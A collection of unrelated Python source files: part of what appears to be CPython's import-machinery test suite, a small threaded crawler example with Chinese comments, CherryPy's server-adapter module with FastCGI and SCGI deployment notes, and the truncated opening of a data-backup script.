del sys.modules[self.module_name]
mod = self.import_module()
self.assertEqual(mod.module_filename, self.file_name)
self.assertEqual(mod.code_filename, self.file_name)
self.assertEqual(mod.func_filename, self.file_name)
def test_incorrect_code_name(self):
py_compile.compile(self.file_name, dfile="another_module.py")
mod = self.import_module()
self.assertEqual(mod.module_filename, self.file_name)
self.assertEqual(mod.code_filename, self.file_name)
self.assertEqual(mod.func_filename, self.file_name)
def test_module_without_source(self):
target = "another_module.py"
py_compile.compile(self.file_name, dfile=target)
os.remove(self.file_name)
pyc_file = make_legacy_pyc(self.file_name)
importlib.invalidate_caches()
mod = self.import_module()
self.assertEqual(mod.module_filename, pyc_file)
self.assertEqual(mod.code_filename, target)
self.assertEqual(mod.func_filename, target)
def test_foreign_code(self):
py_compile.compile(self.file_name)
with open(self.compiled_name, "rb") as f:
header = f.read(16)
code = marshal.load(f)
constants = list(code.co_consts)
foreign_code = importlib.import_module.__code__
pos = constants.index(1)
constants[pos] = foreign_code
code = type(code)(code.co_argcount, code.co_kwonlyargcount,
code.co_nlocals, code.co_stacksize,
code.co_flags, code.co_code, tuple(constants),
code.co_names, code.co_varnames, code.co_filename,
code.co_name, code.co_firstlineno, code.co_lnotab,
code.co_freevars, code.co_cellvars)
with open(self.compiled_name, "wb") as f:
f.write(header)
marshal.dump(code, f)
mod = self.import_module()
self.assertEqual(mod.constant.co_filename, foreign_code.co_filename)
class PathsTests(unittest.TestCase):
SAMPLES = ('test', 'test\u00e4\u00f6\u00fc\u00df', 'test\u00e9\u00e8',
'test\u00b0\u00b3\u00b2')
path = TESTFN
def setUp(self):
os.mkdir(self.path)
self.syspath = sys.path[:]
def tearDown(self):
rmtree(self.path)
sys.path[:] = self.syspath
# Regression test for http://bugs.python.org/issue1293.
def test_trailing_slash(self):
with open(os.path.join(self.path, 'test_trailing_slash.py'), 'w') as f:
f.write("testdata = 'test_trailing_slash'")
sys.path.append(self.path+'/')
mod = __import__("test_trailing_slash")
self.assertEqual(mod.testdata, 'test_trailing_slash')
unload("test_trailing_slash")
# Regression test for http://bugs.python.org/issue3677.
@unittest.skipUnless(sys.platform == 'win32', 'Windows-specific')
def test_UNC_path(self):
with open(os.path.join(self.path, 'test_unc_path.py'), 'w') as f:
f.write("testdata = 'test_unc_path'")
importlib.invalidate_caches()
# Create the UNC path, like \\myhost\c$\foo\bar.
path = os.path.abspath(self.path)
import socket
hn = socket.gethostname()
drive = path[0]
unc = "\\\\%s\\%s$"%(hn, drive)
unc += path[2:]
try:
os.listdir(unc)
except OSError as e:
if e.errno in (errno.EPERM, errno.EACCES, errno.ENOENT):
# See issue #15338
self.skipTest("cannot access administrative share %r" % (unc,))
raise
sys.path.insert(0, unc)
try:
mod = __import__("test_unc_path")
except ImportError as e:
self.fail("could not import 'test_unc_path' from %r: %r"
% (unc, e))
self.assertEqual(mod.testdata, 'test_unc_path')
self.assertTrue(mod.__file__.startswith(unc), mod.__file__)
unload("test_unc_path")
class RelativeImportTests(unittest.TestCase):
def tearDown(self):
unload("test.relimport")
setUp = tearDown
def test_relimport_star(self):
# This will import * from .test_import.
from .. import relimport
self.assertTrue(hasattr(relimport, "RelativeImportTests"))
def test_issue3221(self):
# Note for mergers: the 'absolute' tests from the 2.x branch
# are missing in Py3k because implicit relative imports are
# a thing of the past
#
# Regression test for http://bugs.python.org/issue3221.
def check_relative():
exec("from . import relimport", ns)
# Check relative import OK with __package__ and __name__ correct
ns = dict(__package__='test', __name__='test.notarealmodule')
check_relative()
# Check relative import OK with only __name__ wrong
ns = dict(__package__='test', __name__='notarealpkg.notarealmodule')
check_relative()
# Check relative import fails with only __package__ wrong
ns = dict(__package__='foo', __name__='test.notarealmodule')
self.assertRaises(ModuleNotFoundError, check_relative)
# Check relative import fails with __package__ and __name__ wrong
ns = dict(__package__='foo', __name__='notarealpkg.notarealmodule')
self.assertRaises(ModuleNotFoundError, check_relative)
# Check relative import fails with package set to a non-string
ns = dict(__package__=object())
self.assertRaises(TypeError, check_relative)
def test_absolute_import_without_future(self):
# If explicit relative import syntax is used, then do not try
# to perform an absolute import in the face of failure.
# Issue #7902.
with self.assertRaises(ImportError):
from .os import sep
self.fail("explicit relative import triggered an "
"implicit absolute import")
def test_import_from_non_package(self):
path = os.path.join(os.path.dirname(__file__), 'data', 'package2')
with uncache('submodule1', 'submodule2'), DirsOnSysPath(path):
with self.assertRaises(ImportError):
import submodule1
self.assertNotIn('submodule1', sys.modules)
self.assertNotIn('submodule2', sys.modules)
def test_import_from_unloaded_package(self):
with uncache('package2', 'package2.submodule1', 'package2.submodule2'), \
DirsOnSysPath(os.path.join(os.path.dirname(__file__), 'data')):
import package2.submodule1
package2.submodule1.submodule2
class OverridingImportBuiltinTests(unittest.TestCase):
def test_override_builtin(self):
# Test that overriding builtins.__import__ can bypass sys.modules.
import os
def foo():
import os
return os
self.assertEqual(foo(), os) # Quick sanity check.
with swap_attr(builtins, "__import__", lambda *x: 5):
self.assertEqual(foo(), 5)
# Test what happens when we shadow __import__ in globals(); this
# currently does not impact the import process, but if this changes,
# other code will need to change, so keep this test as a tripwire.
with swap_item(globals(), "__import__", lambda *x: 5):
self.assertEqual(foo(), os)
class PycacheTests(unittest.TestCase):
# Test the various PEP 3147/488-related behaviors.
def _clean(self):
forget(TESTFN)
rmtree('__pycache__')
unlink(self.source)
def setUp(self):
self.source = TESTFN + '.py'
self._clean()
with open(self.source, 'w') as fp:
print('# This is a test file written by test_import.py', file=fp)
sys.path.insert(0, os.curdir)
importlib.invalidate_caches()
def tearDown(self):
assert sys.path[0] == os.curdir, 'Unexpected sys.path[0]'
del sys.path[0]
self._clean()
@skip_if_dont_write_bytecode
def test_import_pyc_path(self):
self.assertFalse(os.path.exists('__pycache__'))
__import__(TESTFN)
self.assertTrue(os.path.exists('__pycache__'))
pyc_path = importlib.util.cache_from_source(self.source)
self.assertTrue(os.path.exists(pyc_path),
'bytecode file {!r} for {!r} does not '
'exist'.format(pyc_path, TESTFN))
@unittest.skipUnless(os.name == 'posix',
"test meaningful only on posix systems")
@unittest.skipIf(hasattr(os, 'geteuid') and os.geteuid() == 0,
"due to varying filesystem permission semantics (issue #11956)")
@skip_if_dont_write_bytecode
def test_unwritable_directory(self):
# When the umask causes the new __pycache__ directory to be
# unwritable, the import still succeeds but no .pyc file is written.
with temp_umask(0o222):
__import__(TESTFN)
self.assertTrue(os.path.exists('__pycache__'))
pyc_path = importlib.util.cache_from_source(self.source)
self.assertFalse(os.path.exists(pyc_path),
'bytecode file {!r} for {!r} '
'exists'.format(pyc_path, TESTFN))
@skip_if_dont_write_bytecode
def test_missing_source(self):
# With PEP 3147 cache layout, removing the source but leaving the pyc
# file does not satisfy the import.
__import__(TESTFN)
pyc_file = importlib.util.cache_from_source(self.source)
self.assertTrue(os.path.exists(pyc_file))
os.remove(self.source)
forget(TESTFN)
importlib.invalidate_caches()
self.assertRaises(ImportError, __import__, TESTFN)
@skip_if_dont_write_bytecode
def test_missing_source_legacy(self):
# Like test_missing_source() except that for backward compatibility,
# when the pyc file lives where the py file would have been (and named
# without the tag), it is importable. The __file__ of the imported
# module is the pyc location.
__import__(TESTFN)
# pyc_file gets removed in _clean() via tearDown().
pyc_file = make_legacy_pyc(self.source)
os.remove(self.source)
unload(TESTFN)
importlib.invalidate_caches()
m = __import__(TESTFN)
try:
self.assertEqual(m.__file__,
os.path.join(os.curdir, os.path.relpath(pyc_file)))
finally:
os.remove(pyc_file)
def test___cached__(self):
# Modules now also have an __cached__ that points to the pyc file.
m = __import__(TESTFN)
pyc_file = importlib.util.cache_from_source(TESTFN + '.py')
self.assertEqual(m.__cached__, os.path.join(os.curdir, pyc_file))
@skip_if_dont_write_bytecode
def test___cached___legacy_pyc(self):
# Like test___cached__() except that for backward compatibility,
# when the pyc file lives where the py file would have been (and named
# without the tag), it is importable. The __cached__ of the imported
# module is the pyc location.
__import__(TESTFN)
# pyc_file gets removed in _clean() via tearDown().
pyc_file = make_legacy_pyc(self.source)
os.remove(self.source)
unload(TESTFN)
importlib.invalidate_caches()
m = __import__(TESTFN)
self.assertEqual(m.__cached__,
os.path.join(os.curdir, os.path.relpath(pyc_file)))
@skip_if_dont_write_bytecode
def test_package___cached__(self):
# Like test___cached__ but for packages.
def cleanup():
rmtree('pep3147')
unload('pep3147.foo')
unload('pep3147')
os.mkdir('pep3147')
self.addCleanup(cleanup)
# Touch the __init__.py
with open(os.path.join('pep3147', '__init__.py'), 'w'):
pass
with open(os.path.join('pep3147', 'foo.py'), 'w'):
pass
importlib.invalidate_caches()
m = __import__('pep3147.foo')
init_pyc = importlib.util.cache_from_source(
os.path.join('pep3147', '__init__.py'))
self.assertEqual(m.__cached__, os.path.join(os.curdir, init_pyc))
foo_pyc = importlib.util.cache_from_source(os.path.join('pep3147', 'foo.py'))
self.assertEqual(sys.modules['pep3147.foo'].__cached__,
os.path.join(os.curdir, foo_pyc))
def test_package___cached___from_pyc(self):
# Like test___cached__ but ensuring __cached__ when imported from a
# PEP 3147 pyc file.
def cleanup():
rmtree('pep3147')
unload('pep3147.foo')
unload('pep3147')
os.mkdir('pep3147')
self.addCleanup(cleanup)
# Touch the __init__.py
with open(os.path.join('pep3147', '__init__.py'), 'w'):
pass
with open(os.path.join('pep3147', 'foo.py'), 'w'):
pass
importlib.invalidate_caches()
m = __import__('pep3147.foo')
unload('pep3147.foo')
unload('pep3147')
importlib.invalidate_caches()
m = __import__('pep3147.foo')
init_pyc = importlib.util.cache_from_source(
os.path.join('pep3147', '__init__.py'))
self.assertEqual(m.__cached__, os.path.join(os.curdir, init_pyc))
foo_pyc = importlib.util.cache_from_source(os.path.join('pep3147', 'foo.py'))
self.assertEqual(sys.modules['pep3147.foo'].__cached__,
os.path.join(os.curdir, foo_pyc))
def test_recompute_pyc_same_second(self):
# Even when the source file doesn't change timestamp, a change in
# source size is enough to trigger recomputation of the pyc file.
__import__(TESTFN)
unload(TESTFN)
with open(self.source, 'a') as fp:
print("x = 5", file=fp)
m = __import__(TESTFN)
self.assertEqual(m.x, 5)
class TestSymbolicallyLinkedPackage(unittest.TestCase):
package_name = 'sample'
tagged = package_name + '-tagged'
def setUp(self):
test.support.rmtree(self.tagged)
test.support.rmtree(self.package_name)
self.orig_sys_path = sys.path[:]
# create a sample package; imagine you have a package with a tag and
# you want to symbolically link it from its untagged name.
os.mkdir(self.tagged)
self.addCleanup(test.support.rmtree, self.tagged)
init_file = os.path.join(self.tagged, '__init__.py')
test.support.create_empty_file(init_file)
assert os.path.exists(init_file)
# now create a symlink to the tagged package
# sample -> sample-tagged
os.symlink(self.tagged, self.package_name, target_is_directory=True)
self.addCleanup(test.support.unlink, self.package_name)
importlib.invalidate_caches()
self.assertEqual(os.path.isdir(self.package_name), True)
assert os.path.isfile(os.path.join(self.package_name, '__init__.py'))
def tearDown(self):
sys.path[:] = self.orig_sys_path
# regression test for issue6727
@unittest.skipUnless(
not hasattr(sys, 'getwindowsversion')
or sys.getwindowsversion() >= (6, 0),
"Windows Vista or later required")
@test.support.skip_unless_symlink
def test_symlinked_dir_importable(self):
# make sure sample can only be imported from the current directory.
sys.path[:] = ['.']
assert os.path.exists(self.package_name)
assert os.path.exists(os.path.join(self.package_name, '__init__.py'))
# Try to import the package
importlib.import_module(self.package_name)
@cpython_only
class ImportlibBootstrapTests(unittest.TestCase):
# These tests check that importlib is bootstrapped.
def test_frozen_importlib(self):
mod = sys.modules['_frozen_importlib']
self.assertTrue(mod)
def test_frozen_importlib_is_bootstrap(self):
from importlib import _bootstrap
mod = sys.modules['_frozen_importlib']
self.assertIs(mod, _bootstrap)
self.assertEqual(mod.__name__, 'importlib._bootstrap')
self.assertEqual(mod.__package__, 'importlib')
self.assertTrue(mod.__file__.endswith('_bootstrap.py'), mod.__file__)
def test_frozen_importlib_external_is_bootstrap_external(self):
from importlib import _bootstrap_external
mod = sys.modules['_frozen_importlib_external']
self.assertIs(mod, _bootstrap_external)
self.assertEqual(mod.__name__, 'importlib._bootstrap_external')
self.assertEqual(mod.__package__, 'importlib')
self.assertTrue(mod.__file__.endswith('_bootstrap_external.py'), mod.__file__)
def test_there_can_be_only_one(self):
# Issue #15386 revealed a tricky loophole in the bootstrapping
# This test is technically redundant, since the bug caused importing
# this test module to crash completely, but it helps prove the point
from importlib import machinery
mod = sys.modules['_frozen_importlib']
self.assertIs(machinery.ModuleSpec, mod.ModuleSpec)
@cpython_only
class GetSourcefileTests(unittest.TestCase):
"""Test importlib._bootstrap_external._get_sourcefile() as used by the C API.
Because of the peculiarities of the need of this function, the tests are
knowingly whitebox tests.
"""
def test_get_sourcefile(self):
# Given a valid bytecode path, return the path to the corresponding
# source file if it exists.
with mock.patch('importlib._bootstrap_external._path_isfile') as _path_isfile:
_path_isfile.return_value = True;
path = TESTFN + '.pyc'
expect = TESTFN + '.py'
self.assertEqual(_get_sourcefile(path), expect)
def test_get_sourcefile_no_source(self):
# Given a valid bytecode path without a corresponding source path,
# return the original bytecode path.
with mock.patch('importlib._bootstrap_external._path_isfile') as _path_isfile:
_path_isfile.return_value = False;
path = TESTFN + '.pyc'
self.assertEqual(_get_sourcefile(path), path)
def test_get_sourcefile_bad_ext(self):
# Given a path with an invalid bytecode extension, return the
# bytecode path passed as the argument.
path = TESTFN + '.bad_ext'
self.assertEqual(_get_sourcefile(path), path)
class ImportTracebackTests(unittest.TestCase):
def setUp(self):
os.mkdir(TESTFN)
self.old_path = sys.path[:]
sys.path.insert(0, TESTFN)
def tearDown(self):
sys.path[:] = self.old_path
rmtree(TESTFN)
def create_module(self, mod, contents, ext=".py"):
fname = os.path.join(TESTFN, mod + ext)
with open(fname, "w") as f:
f.write(contents)
self.addCleanup(unload, mod)
importlib.invalidate_caches()
return fname
def assert_traceback(self, tb, files):
deduped_files = []
while tb:
code = tb.tb_frame.f_code
fn = code.co_filename
if not deduped_files or fn != deduped_files[-1]:
deduped_files.append(fn)
tb = tb.tb_next
self.assertEqual(len(deduped_files), len(files), deduped_files)
for fn, pat in zip(deduped_files, files):
self.assertIn(pat, fn)
def test_nonexistent_module(self):
try:
# assertRaises() clears __traceback__
import nonexistent_xyzzy
except ImportError as e:
tb = e.__traceback__
else:
self.fail("ImportError should have been raised")
self.assert_traceback(tb, [__file__])
def test_nonexistent_module_nested(self):
self.create_module("foo", "import nonexistent_xyzzy")
try:
import foo
except ImportError as e:
tb = e.__traceback__
else:
self.fail("ImportError should have been raised")
self.assert_traceback(tb, [__file__, 'foo.py'])
def test_exec_failure(self):
self.create_module("foo", "1/0")
try:
import foo
except ZeroDivisionError as e:
tb = e.__traceback__
else:
self.fail("ZeroDivisionError should have been raised")
self.assert_traceback(tb, [__file__, 'foo.py'])
def test_exec_failure_nested(self):
self.create_module("foo", "import bar")
self.create_module("bar", "1/0")
try:
import foo
except ZeroDivisionError as e:
tb = e.__traceback__
else:
self.fail("ZeroDivisionError should have been raised")
self.assert_traceback(tb, [__file__, 'foo.py', 'bar.py'])
# A few more examples from issue #15425
def test_syntax_error(self):
self.create_module("foo", "invalid syntax is invalid")
try:
import foo
except SyntaxError as e:
tb = e.__traceback__
else:
self.fail("SyntaxError should have been raised")
self.assert_traceback(tb, [__file__])
def _setup_broken_package(self, parent, child):
pkg_name = "_parent_foo"
self.addCleanup(unload, pkg_name)
pkg_path = os.path.join(TESTFN, pkg_name)
os.mkdir(pkg_path)
# Touch the __init__.py
init_path = os.path.join(pkg_path, '__init__.py')
with open(init_path, 'w') as f:
f.write(parent)
bar_path = os.path.join(pkg_path, 'bar.py')
with open(bar_path, 'w') as f:
f.write(child)
importlib.invalidate_caches()
return init_path, bar_path
def test_broken_submodule(self):
init_path, bar_path = self._setup_broken_package("", "1/0")
try:
import _parent_foo.bar
except ZeroDivisionError as e:
tb = e.__traceback__
else:
self.fail("ZeroDivisionError should have been raised")
self.assert_traceback(tb, [__file__, bar_path])
def test_broken_from(self):
init_path, bar_path = self._setup_broken_package("", "1/0")
try:
from _parent_foo import bar
except ZeroDivisionError as e:
tb = e.__traceback__
else:
self.fail("ImportError should have been raised")
self.assert_traceback(tb, [__file__, bar_path])
def test_broken_parent(self):
init_path, bar_path = self._setup_broken_package("1/0", "")
try:
import _parent_foo.bar
except ZeroDivisionError as e:
tb = e.__traceback__
else:
self.fail("ZeroDivisionError should have been raised")
self.assert_traceback(tb, [__file__, init_path])
def test_broken_parent_from(self):
init_path, bar_path = self._setup_broken_package("1/0", "")
try:
from _parent_foo import bar
except ZeroDivisionError as e:
tb = e.__traceback__
else:
self.fail("ZeroDivisionError should have been raised")
self.assert_traceback(tb, [__file__, init_path])
@cpython_only
def test_import_bug(self):
# We simulate a bug in importlib and check that it's not stripped
# away from the traceback.
self.create_module("foo", "")
importlib = sys.modules['_frozen_importlib_external']
if 'load_module' in vars(importlib.SourceLoader):
old_exec_module = importlib.SourceLoader.exec_module
else:
old_exec_module = None
try:
def exec_module(*args):
1/0
importlib.SourceLoader.exec_module = exec_module
try:
import foo
except ZeroDivisionError as e:
tb = e.__traceback__
else:
self.fail("ZeroDivisionError should have been raised")
self.assert_traceback(tb, [__file__, '<frozen importlib', __file__])
finally:
if old_exec_module is None:
del importlib.SourceLoader.exec_module
else:
importlib.SourceLoader.exec_module = old_exec_module
@unittest.skipUnless(TESTFN_UNENCODABLE, 'need TESTFN_UNENCODABLE')
def test_unencodable_filename(self):
# Issue #11619: The Python parser and the import machinery must not
# encode filenames, especially on Windows
pyname = script_helper.make_script('', TESTFN_UNENCODABLE, 'pass')
self.addCleanup(unlink, pyname)
name = pyname[:-3]
script_helper.assert_python_ok("-c", "mod = __import__(%a)" % name,
__isolated=False)
class CircularImportTests(unittest.TestCase):
"""See the docstrings of the modules being imported for the purpose of the
test."""
def tearDown(self):
"""Make sure no modules pre-exist in sys.modules which are being used to
test."""
for key in list(sys.modules.keys()):
if key.startswith('test.test_import.data.circular_imports'):
del sys.modules[key]
def test_direct(self):
try:
import test.test_import.data.circular_imports.basic
except ImportError:
self.fail('circular import through relative imports failed')
def test_indirect(self):
try:
import test.test_import.data.circular_imports.indirect
except ImportError:
self.fail('relative import in module contributing to circular '
'import failed')
def test_subpackage(self):
try:
import test.test_import.data.circular_imports.subpackage
except ImportError:
self.fail('circular import involving a subpackage failed')
def test_rebinding(self):
try:
import test.test_import.data.circular_imports.rebinding as rebinding
except ImportError:
self.fail('circular import with rebinding of module attribute failed')
from test.test_import.data.circular_imports.subpkg import util
self.assertIs(util.util, rebinding.util)
def test_binding(self):
try:
import test.test_import.data.circular_imports.binding
except ImportError:
self.fail('circular import with binding a submodule to a name failed')
if __name__ == '__main__':
# Test needs to be a package, so we can do relative imports.
unittest.main()
|
07_threadingExample.py
|
from threading import Thread
from queue import Queue
class XxxSpider:
def __init__(self):
self.url = 'http://www.abc.com/page{}.html'
self.q = Queue()
def url_to_q(self):
"""
生成所有的url地址,如队列
:return:
"""
for page in range(1, 100001):
page_url = self.url.format(page)
self.q.put(page_url)
def parse_url(self):
"""线程事件函数,获取地址,请求解析数据处理"""
while not self.q.empty():
url = self.q.get()
# 拿出来一个地址,向url发送请求,解析、处理数据
# 多个线程在写同一个文件的时候,会互相争夺资源,解决办法就是使用线程锁
pass
def crawl(self):
# url地址入队列
self.url_to_q()
# 创建多线程爬虫,5个线程
t_list = []
for i in range(5):
t = Thread(target=self.parse_url())
t_list.append(t)
t.start()
# 回收线程
for t in t_list:
t.join()
if __name__ == '__main__':
spider = XxxSpider()
spider.crawl()
|
servers.py
|
r"""
Starting in CherryPy 3.1, cherrypy.server is implemented as an
:ref:`Engine Plugin<plugins>`. It's an instance of
:class:`cherrypy._cpserver.Server`, which is a subclass of
:class:`cherrypy.process.servers.ServerAdapter`. The ``ServerAdapter`` class
is designed to control other servers, as well.
Multiple servers/ports
======================
If you need to start more than one HTTP server (to serve on multiple ports, or
protocols, etc.), you can manually register each one and then start them all
with engine.start::
s1 = ServerAdapter(
cherrypy.engine,
MyWSGIServer(host='0.0.0.0', port=80)
)
s2 = ServerAdapter(
cherrypy.engine,
another.HTTPServer(host='127.0.0.1', SSL=True)
)
s1.subscribe()
s2.subscribe()
cherrypy.engine.start()
.. index:: SCGI
FastCGI/SCGI
============
There are also Flup\ **F**\ CGIServer and Flup\ **S**\ CGIServer classes in
:mod:`cherrypy.process.servers`. To start an fcgi server, for example,
wrap an instance of it in a ServerAdapter::
addr = ('0.0.0.0', 4000)
f = servers.FlupFCGIServer(application=cherrypy.tree, bindAddress=addr)
s = servers.ServerAdapter(cherrypy.engine, httpserver=f, bind_addr=addr)
s.subscribe()
The :doc:`cherryd</deployguide/cherryd>` startup script will do the above for
you via its `-f` flag.
Note that you need to download and install `flup <http://trac.saddi.com/flup>`_
yourself, whether you use ``cherryd`` or not.
.. _fastcgi:
.. index:: FastCGI
FastCGI
-------
A very simple setup lets your cherry run with FastCGI.
You just need the flup library,
plus a running Apache server (with ``mod_fastcgi``) or lighttpd server.
CherryPy code
^^^^^^^^^^^^^
hello.py::
#!/usr/bin/python
import cherrypy
class HelloWorld:
'''Sample request handler class.'''
@cherrypy.expose
def index(self):
return "Hello world!"
cherrypy.tree.mount(HelloWorld())
# CherryPy autoreload must be disabled for the flup server to work
cherrypy.config.update({'engine.autoreload.on':False})
Then run :doc:`/deployguide/cherryd` with the '-f' arg::
cherryd -c <myconfig> -d -f -i hello.py
Apache
^^^^^^
At the top level in httpd.conf::
FastCgiIpcDir /tmp
FastCgiServer /path/to/cherry.fcgi -idle-timeout 120 -processes 4
And inside the relevant VirtualHost section::
# FastCGI config
AddHandler fastcgi-script .fcgi
ScriptAliasMatch (.*$) /path/to/cherry.fcgi$1
Lighttpd
^^^^^^^^
For `Lighttpd <http://www.lighttpd.net/>`_ you can follow these
instructions. Within ``lighttpd.conf`` make sure ``mod_fastcgi`` is
active within ``server.modules``. Then, within your ``$HTTP["host"]``
directive, configure your fastcgi script like the following::
$HTTP["url"] =~ "" {
fastcgi.server = (
"/" => (
"script.fcgi" => (
"bin-path" => "/path/to/your/script.fcgi",
"socket" => "/tmp/script.sock",
"check-local" => "disable",
"disable-time" => 1,
"min-procs" => 1,
"max-procs" => 1, # adjust as needed
),
),
)
} # end of $HTTP["url"] =~ "^/"
Please see `Lighttpd FastCGI Docs
<http://redmine.lighttpd.net/wiki/lighttpd/Docs:ModFastCGI>`_ for
an explanation of the possible configuration options.
"""
import os
import sys
import time
import warnings
import contextlib
import portend
class Timeouts:
occupied = 5
free = 1
class ServerAdapter(object):
"""Adapter for an HTTP server.
If you need to start more than one HTTP server (to serve on multiple
ports, or protocols, etc.), you can manually register each one and then
start them all with bus.start::
s1 = ServerAdapter(bus, MyWSGIServer(host='0.0.0.0', port=80))
s2 = ServerAdapter(bus, another.HTTPServer(host='127.0.0.1', SSL=True))
s1.subscribe()
s2.subscribe()
bus.start()
"""
def __init__(self, bus, httpserver=None, bind_addr=None):
self.bus = bus
self.httpserver = httpserver
self.bind_addr = bind_addr
self.interrupt = None
self.running = False
def subscribe(self):
self.bus.subscribe('start', self.start)
self.bus.subscribe('stop', self.stop)
def unsubscribe(self):
self.bus.unsubscribe('start', self.start)
self.bus.unsubscribe('stop', self.stop)
def start(self):
"""Start the HTTP server."""
if self.running:
self.bus.log('Already serving on %s' % self.description)
return
self.interrupt = None
if not self.httpserver:
raise ValueError('No HTTP server has been created.')
if not os.environ.get('LISTEN_PID', None):
# Start the httpserver in a new thread.
if isinstance(self.bind_addr, tuple):
portend.free(*self.bind_addr, timeout=Timeouts.free)
import threading
t = threading.Thread(target=self._start_http_thread)
t.setName('HTTPServer ' + t.getName())
t.start()
self.wait()
self.running = True
self.bus.log('Serving on %s' % self.description)
start.priority = 75
@property
def description(self):
"""
A description about where this server is bound.
"""
if self.bind_addr is None:
on_what = 'unknown interface (dynamic?)'
elif isinstance(self.bind_addr, tuple):
on_what = self._get_base()
else:
on_what = 'socket file: %s' % self.bind_addr
return on_what
def _get_base(self):
if not self.httpserver:
return ''
host, port = self.bound_addr
if getattr(self.httpserver, 'ssl_adapter', None):
scheme = 'https'
if port != 443:
host += ':%s' % port
else:
scheme = 'http'
if port != 80:
host += ':%s' % port
return '%s://%s' % (scheme, host)
def _start_http_thread(self):
"""HTTP servers MUST be running in new threads, so that the
main thread persists to receive KeyboardInterrupt's. If an
exception is raised in the httpserver's thread then it's
trapped here, and the bus (and therefore our httpserver)
are shut down.
"""
try:
self.httpserver.start()
except KeyboardInterrupt:
self.bus.log('<Ctrl-C> hit: shutting down HTTP server')
self.interrupt = sys.exc_info()[1]
self.bus.exit()
except SystemExit:
self.bus.log('SystemExit raised: shutting down HTTP server')
self.interrupt = sys.exc_info()[1]
self.bus.exit()
raise
except Exception:
self.interrupt = sys.exc_info()[1]
self.bus.log('Error in HTTP server: shutting down',
traceback=True, level=40)
self.bus.exit()
raise
def wait(self):
"""Wait until the HTTP server is ready to receive requests."""
while not getattr(self.httpserver, 'ready', False):
if self.interrupt:
raise self.interrupt
time.sleep(.1)
# bypass check when LISTEN_PID is set
if os.environ.get('LISTEN_PID', None):
return
# bypass check when running via socket-activation
# (for socket-activation the port will be managed by systemd)
if not isinstance(self.bind_addr, tuple):
return
# wait for port to be occupied
with _safe_wait(*self.bound_addr):
portend.occupied(*self.bound_addr, timeout=Timeouts.occupied)
@property
def bound_addr(self):
"""
The bind address, or if it's an ephemeral port and the
socket has been bound, return the actual port bound.
"""
host, port = self.bind_addr
if port == 0 and self.httpserver.socket:
# Bound to ephemeral port. Get the actual port allocated.
port = self.httpserver.socket.getsockname()[1]
return host, port
def stop(self):
"""Stop the HTTP server."""
if self.running:
# stop() MUST block until the server is *truly* stopped.
self.httpserver.stop()
# Wait for the socket to be truly freed.
if isinstance(self.bind_addr, tuple):
portend.free(*self.bound_addr, timeout=Timeouts.free)
self.running = False
self.bus.log('HTTP Server %s shut down' % self.httpserver)
else:
self.bus.log('HTTP Server %s already shut down' % self.httpserver)
stop.priority = 25
def restart(self):
"""Restart the HTTP server."""
self.stop()
self.start()
class FlupCGIServer(object):
"""Adapter for a flup.server.cgi.WSGIServer."""
def __init__(self, *args, **kwargs):
self.args = args
self.kwargs = kwargs
self.ready = False
def start(self):
"""Start the CGI server."""
# We have to instantiate the server class here because its __init__
# starts a threadpool. If we do it too early, daemonize won't work.
from flup.server.cgi import WSGIServer
self.cgiserver = WSGIServer(*self.args, **self.kwargs)
self.ready = True
self.cgiserver.run()
def stop(self):
"""Stop the HTTP server."""
self.ready = False
class FlupFCGIServer(object):
"""Adapter for a flup.server.fcgi.WSGIServer."""
def __init__(self, *args, **kwargs):
if kwargs.get('bindAddress', None) is None:
import socket
if not hasattr(socket, 'fromfd'):
raise ValueError(
'Dynamic FCGI server not available on this platform. '
'You must use a static or external one by providing a '
'legal bindAddress.')
self.args = args
self.kwargs = kwargs
self.ready = False
def start(self):
"""Start the FCGI server."""
# We have to instantiate the server class here because its __init__
# starts a threadpool. If we do it too early, daemonize won't work.
from flup.server.fcgi import WSGIServer
self.fcgiserver = WSGIServer(*self.args, **self.kwargs)
# TODO: report this bug upstream to flup.
# If we don't set _oldSIGs on Windows, we get:
# File "C:\Python24\Lib\site-packages\flup\server\threadedserver.py",
# line 108, in run
# self._restoreSignalHandlers()
# File "C:\Python24\Lib\site-packages\flup\server\threadedserver.py",
# line 156, in _restoreSignalHandlers
# for signum,handler in self._oldSIGs:
# AttributeError: 'WSGIServer' object has no attribute '_oldSIGs'
self.fcgiserver._installSignalHandlers = lambda: None
self.fcgiserver._oldSIGs = []
self.ready = True
self.fcgiserver.run()
def stop(self):
"""Stop the HTTP server."""
# Forcibly stop the fcgi server main event loop.
self.fcgiserver._keepGoing = False
# Force all worker threads to die off.
self.fcgiserver._threadPool.maxSpare = (
self.fcgiserver._threadPool._idleCount)
self.ready = False
class FlupSCGIServer(object):
"""Adapter for a flup.server.scgi.WSGIServer."""
def __init__(self, *args, **kwargs):
self.args = args
self.kwargs = kwargs
self.ready = False
def start(self):
"""Start the SCGI server."""
# We have to instantiate the server class here because its __init__
# starts a threadpool. If we do it too early, daemonize won't work.
from flup.server.scgi import WSGIServer
self.scgiserver = WSGIServer(*self.args, **self.kwargs)
# TODO: report this bug upstream to flup.
# If we don't set _oldSIGs on Windows, we get:
# File "C:\Python24\Lib\site-packages\flup\server\threadedserver.py",
# line 108, in run
# self._restoreSignalHandlers()
# File "C:\Python24\Lib\site-packages\flup\server\threadedserver.py",
# line 156, in _restoreSignalHandlers
# for signum,handler in self._oldSIGs:
# AttributeError: 'WSGIServer' object has no attribute '_oldSIGs'
self.scgiserver._installSignalHandlers = lambda: None
self.scgiserver._oldSIGs = []
self.ready = True
self.scgiserver.run()
def stop(self):
"""Stop the HTTP server."""
self.ready = False
# Forcibly stop the scgi server main event loop.
self.scgiserver._keepGoing = False
# Force all worker threads to die off.
self.scgiserver._threadPool.maxSpare = 0
@contextlib.contextmanager
def _safe_wait(host, port):
"""
On systems where a loopback interface is not available and the
server is bound to all interfaces, it's difficult to determine
whether the server is in fact occupying the port. In this case,
just issue a warning and move on. See issue #1100.
"""
try:
yield
except portend.Timeout:
if host == portend.client_host(host):
raise
msg = 'Unable to verify that the server is bound on %r' % port
warnings.warn(msg)
|
scanbackup_20210224150156.py
|
"""
1、文件到这里
一份给ES 一份给自己
新增ES旧索引入库
在继承原有功能的基础上
重构备份程序,按照数据内的
国家-当前时间(年-月-日)
如果按照数据内的时间的话也会面临和按国家端口备份的问题
不用再分端口了
create by judy 20201217
"""
from pathlib import Path
import threading
import json
from queue import Queue
import traceback
import datetime
import time
from shutil import copyfile
import zipfile
import shutil
class ScanBackUP(object):
def __init__(self) -> None:
# super().__init__()
# 所有数据先到这
self._input = None
# 所有数据先复制一份到这, 这个是程序不用管的文件夹
